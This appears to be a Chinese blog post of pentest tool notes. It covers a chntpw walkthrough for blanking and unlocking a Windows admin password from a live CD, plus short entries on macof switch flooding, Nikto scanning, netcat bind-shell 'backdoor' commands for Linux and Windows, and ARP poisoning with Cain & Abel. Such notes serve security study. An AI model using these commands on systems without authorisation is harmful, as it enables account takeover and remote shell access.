一.chntpw 密码重置
Windows 7/XP/Vista 亲测可用
1. Boot your system using BackTrack LiveCD.
2. Mount your partition containing Windows.
root@bt:~# fdisk -l
Device Boot Start End Blocks Id System
/dev/sda1 * 1 10683 85811166 83 Linux
/dev/sda2 10684 14762 32764567+ 83 Linux
/dev/sda3 14801 56885 338047762+ f W95 Ext'd (LBA)
/dev/sda4 56886 60801 31455270 7 HPFS/NTFS
/dev/sda5 14802 32664 143484547+ 7 HPFS/NTFS
/dev/sda6 32665 56885 194555151 83 Linux
root@bt:~# cd /media; mkdir dex
root@bt:~# mount -t ntfs /dev/sda3 /media/dex
Note - /dev/sda4 is partition containing Windows and /media/dex is the mount point.
3. Fire up chntpw.
Though it is pretty explanatory but here's an example as how to remove password from an Admin account which is locked.
root@bt:~# cd /pentest/passwords/chntpw/
root@bt:/pentest/passwords/chntpw#
root@bt:/pentest/passwords/chntpw# find /media/dex/ -iname sam
/media/dex/Windows/System32/config/RegBack/SAM
/media/dex/Windows/System32/config/SAM
^C
root@bt:/pentest/passwords/chntpw# ./chntpw -i /media/dex/Windows/System32/config/SAM
<>========<> chntpw Main Interactive Menu <>========<>
Loaded hives: </media/dex/Windows/System32/config/SAM>
1 - Edit user data and passwords
- - -
9 - Registry editor, now with full write support!
q - Quit (you will be asked if there is something to save)
What to do? [1] -> 1
===== chntpw Edit User Info & Passwords ====
| RID -|---------- Username -------------| Admin? |- Lock? --|
| 01f4 | Administrator | ADMIN | dis/lock |
| 03e8 | Dexter | ADMIN | dis/lock |
| 01f5 | Guest | | dis/lock |
Select: ! - quit, . - list users, 0x<RID> - User with RID (hex)
or simply enter the username to change: [Administrator] Administrator
- - - - User Edit Menu:
1 - Clear (blank) user password
2 - Edit (set new) user password (careful with this on XP or Vista)
3 - Promote user (make user an administrator)
4 - Unlock and enable user account [probably locked now]
q - Quit editing user, back to user select
Select: [q] > 1
Password cleared!
Select: ! - quit, . - list users, 0x<RID> - User with RID (hex)
or simply enter the username to change: [Administrator] Administrator
- - - - User Edit Menu:
1 - Clear (blank) user password
2 - Edit (set new) user password (careful with this on XP or Vista)
3 - Promote user (make user an administrator)
4 - Unlock and enable user account [probably locked now]
q - Quit editing user, back to user select
Select: [q] > 4
Unlocked! [note- this step is important as the Admin account was locked]
Select: ! - quit, . - list users, 0x<RID> - User with RID (hex)
or simply enter the username to change: [Administrator] !
<>========<> chntpw Main Interactive Menu <>========<>
Loaded hives: </media/dex/Windows/System32/config/SAM>
1 - Edit user data and passwords
- - -
9 - Registry editor, now with full write support!
q - Quit (you will be asked if there is something to save)
What to do? [1] -> q
Hives that have changed:
# Name
0 </media/dex/Windows/System32/config/SAM>
Write hive files? (y/n) [n] : y
0 </media/dexWindows/System32/config/SAM> - OK
root@bt:/pentest/passwords/chntpw# 二.macof 攻击交换机
macof [-i interface] [-s src] [-d dst] [-e tha] [-x sport] [-y dport] [-n times] 三.扫描Web服务器:Nikto
1. 快速入门
进行最基本的nikto扫描,你只需要指定目标的host(通过 -h 参数指定),也可以指定要扫描的端口号(通过 -p 来指定),默认是80
perl nikto.pl -h 192.168.0.1
2 多端口扫描
#扫描80,88,443三个端口
perl nikto.pl -h 192.168.0.1 -p 80,88,443
#扫描80~90共10个端口
perl nikto.pl -h 192.168.0.1 -p 80-90
四.Netcat
加密版Cryptcat
1.上传文件
nc -l -p 7777>calc.exe 远程监听保存文件到calc
nc 172.16.24.129 77 <calc.exe 上传文件nc 172.16.24.129 50001 查看返回内容3.创建后门
nc -l -p 12345 -e /bin/sh #linux
nc.exe -L -p 12345 c:\windows\system32\cmd.exe #windows
五.tcpdump
wireshark文本版,处理海量数据有效
六.Cain&Abel
Windows下最强的ARP缓存中毒
七.scapy
最强的数据包操纵python库,Netdude是图形化的scapy
八.hping
命令行数据包操纵工具
九.Tamper Data
对Http信息进行分析,修改
3244
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
